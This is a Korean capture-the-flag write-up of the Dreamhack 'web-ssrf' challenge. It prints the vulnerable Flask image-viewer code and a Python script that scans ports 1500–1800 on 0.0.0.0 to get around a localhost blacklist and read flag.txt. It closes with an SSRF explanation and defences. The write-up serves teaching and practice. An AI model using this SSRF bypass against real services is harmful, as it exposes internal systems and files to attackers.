[Dreamhack] Level2: web-ssrf

🛎️Access

flask로 작성된 image viewer 서비스이다.

SSRF 취약점을 이용해 플래그를 획득. 플래그는 /app/flag.txt에 있다.

 

 

👾Exploit Algorithm & Payload

#!/usr/bin/python3
from flask import (
    Flask,
    request,
    render_template
)
import http.server
import threading
import requests
import os, random, base64
from urllib.parse import urlparse

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open("./flag.txt", "r").read()  # Flag is here!!
except:
    FLAG = "[**FLAG**]"


@app.route("/")
def index():
    return render_template("index.html")


@app.route("/img_viewer", methods=["GET", "POST"])
def img_viewer():
    if request.method == "GET":
        return render_template("img_viewer.html")
    elif request.method == "POST":
        url = request.form.get("url", "")
        urlp = urlparse(url)
        if url[0] == "/":
            url = "http://localhost:8000" + url
        elif ("localhost" in urlp.netloc) or ("127.0.0.1" in urlp.netloc):
            data = open("error.png", "rb").read()
            img = base64.b64encode(data).decode("utf8")
            return render_template("img_viewer.html", img=img)
        try:
            data = requests.get(url, timeout=3).content
            img = base64.b64encode(data).decode("utf8")
        except:
            data = open("error.png", "rb").read()
            img = base64.b64encode(data).decode("utf8")
        return render_template("img_viewer.html", img=img)


local_host = "127.0.0.1"
local_port = random.randint(1500, 1800)
local_server = http.server.HTTPServer(
    (local_host, local_port), http.server.SimpleHTTPRequestHandler
)


def run_local_server():
    local_server.serve_forever()


threading._start_new_thread(run_local_server, ())

app.run(host="0.0.0.0", port=8000, threaded=True)

 

 

#1

---

: '/img_viewer' 페이지에서 버튼을 클릭하면 해당 경로에서 static 폴더 안의 dream.png 이미지로 이동할 수 있는 url처럼 보인다.

 

 

#2

---

: POST 방식으로 해당 이미지를 불러온 결과 정상적으로 이미지를 확인할 수 있다.

: 또한 이미지 태그의 src 속성의 값이 base64인코딩 되어있다는 것을 확인할 수 있다.

 

 

#3

---

#...
elif ("localhost" in urlp.netloc) or ("127.0.0.1" in urlp.netloc):
    data = open("error.png", "rb").read()
    img = base64.b64encode(data).decode("utf8")
    return render_template("img_viewer.html", img=img)
#...
local_host = "127.0.0.1"
local_port = random.randint(1500, 1800)
local_server = http.server.HTTPServer(
    (local_host, local_port), http.server.SimpleHTTPRequestHandler
#...

: 서버 동작 코드를 살펴보니 local_host는 루프백(127.0.0.1 or localhost or 0.0.0.0)임을 알 수 있다.

: 하지만 루프백 중에서 localhost와 127.0.0.1은 막혔다.(0.0.0.0사용 가능)

: local_port는 random하게 1500~1800사이임을 알 수 있다.

: '/static/dream.png'의 응답의 Content-Length는 51917인 것을 확인할 수 있다.

: 따라서 포트번호를 동작시켜 Content-Length 값의 변화를 확인해야겠다고 판단했다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

import requests

url = f"http://host3.dreamhack.games:24474/img_viewer"
#<img src="data:image/png;base64, iVBORw0KGgoAAAANSUhE...">
#base64 인코딩 출력 일부 값
value = "iVBORw0KGgoAAAANSUhE"

#port 1500~1800
for port in range(1500,1801):
    #loopback(ban: localhost, 127.0.0.1)
    #/app/flag.txt
    port = str(port)
    randome_url = f"http://0.0.0.0:{port}/flag.txt"
    data = {
        "url" : randome_url
    }
    response = requests.post(url, data)
    #print(response.text)
    content_length = response.headers["Content-Length"]
    
    if value in response.text:
        print(f"randome_url: {randome_url}, Content-Length: {content_length} => failure \n")
    else:
        print(f"[*] randome_url: {randome_url}, Content-Length: {content_length} => success")
        print(response.text)
        break

 

: 다음과 같이 익스플로잇 코드를 작성했다.

: #3에 "/static/dream.png'의 응답의 Content-Length는 51917인 것을 확인할 수 있다."라는 결과와는 다르게 Content-Length가 나오게 됐다.

(여기서는  65121)

: 그래도 결국 port 번호들 중에서 다른 Content-Length를 파악할 수 있었기 때문에 해당 값이 다름을 의심할 수 있었다.

 

refer to) https://www.convertstring.com/ko/EncodeDecode/Base64Decode

: base64 인코딩 값으로 결과가 나온 것을 디코딩하면 다음과 같이 FLAG를 획득할 수 있다. 

 

 

 

[+] Additional Checks

---

: burp suite 도구를 사용하여 FLAG를 획득할 수도 있다.

 

 

📌Summary

---

Server-Side Request Forgery(SSRF)
웹 서비스는 외부에서  접근할 수 없는 내부망의 기능을 사용할 때가 많은데 이 기능은 백오피스 서비스로 예를 들 수 있다.

 백오피스 서비스는 일선 업무 이외에 후방에서 일선 업무를 지원하고 도와주는 부서 또는 그런 업무의 목적이다.  즉, 외부에서 직접 접근할 수 없는 내부망 서비스와 통신할 수 있게 되는 것이다. 만약 공격자가 SSRF 취약점을 통해 웹 서비스의 권한으로 요청을 보낼 수 있다면 공격자는 외부에서 간접적으로 내부망 서비스를 이용할 수 있는 것이다.

 해당 취약점은 웹 애플리케이션의 요청을 변조할 수 있기 때문에 매우 치명적인 취약점이라 볼 수 있기에 상황에 맞게 대응할 필요가 있다.

 

-대응방안-

1) 입력 유효성 검사(화이트리스트, 블랙리스트)

: 사용자가 제공한 입력과 URL, 매개변수를 철저하게 유효성 검사 필요

2) 신뢰할 수 있는 라이브러리 및 프레임워크 사용

3) 방화벽 구성 주의

4) 네트워크 분할

5) 서버 측 요청 기능 제한

...